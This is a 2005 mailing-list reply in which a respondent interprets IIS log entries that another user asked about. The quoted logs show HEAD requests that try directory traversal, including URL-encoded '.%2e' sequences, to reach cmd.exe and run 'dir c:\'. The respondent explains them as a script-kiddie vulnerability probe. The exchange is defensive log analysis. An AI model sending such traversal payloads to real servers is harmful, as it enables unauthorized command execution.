Ricardo Montenegro am Montag, 19. Dezember 2005 22.24:
Is atack?
2005-12-13 12:48:30 W3SVC1 192.168.1.2 <http://192.168.1.2> HEAD
/samples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 -
82.163.230.113 <http://82.163.230.113> - 404 0 3
2005-12-13 12:48:31 W3SVC1 192.168.1.2 <http://192.168.1.2> HEAD
/scripts..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 82.163.230.113
<http://82.163.230.113> - 404 0 3
2005-12-13 12:48:31 W3SVC1 192.168.1.2 <http://192.168.1.2> HEAD
/scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 80 - 82.163.230.113
<http://82.163.230.113> - 404 0 3
It's a try to execute cmd.exe, and since it's improbable that you have such a
link anywhere to your site, it's a check for a vulnerability (rather than a
real attack, I think).
As you can see, there are several possibilities tried to traverse paths by
circumventing (dumb) anti path traversal algorithms. This means that no
attack vector is known yet, but "only" tried.
So, it looks like coming from a script kiddie. I see such tries every day in
the (apache) logs.
joe
---------------------------------------------------------------------------
EARN A MASTER OF SCIENCE IN INFORMATION ASSURANCE - ONLINE
The Norwich University program offers unparalleled Infosec management
education and the case study affords you unmatched consulting experience.
Tailor your education to your own professional goals with degree
customizations including Emergency Management, Business Continuity Planning,
Computer Emergency Response Teams, and Digital Investigations.
http://www.msia.norwich.edu/secfocus
----------------------------------------------------------------------------
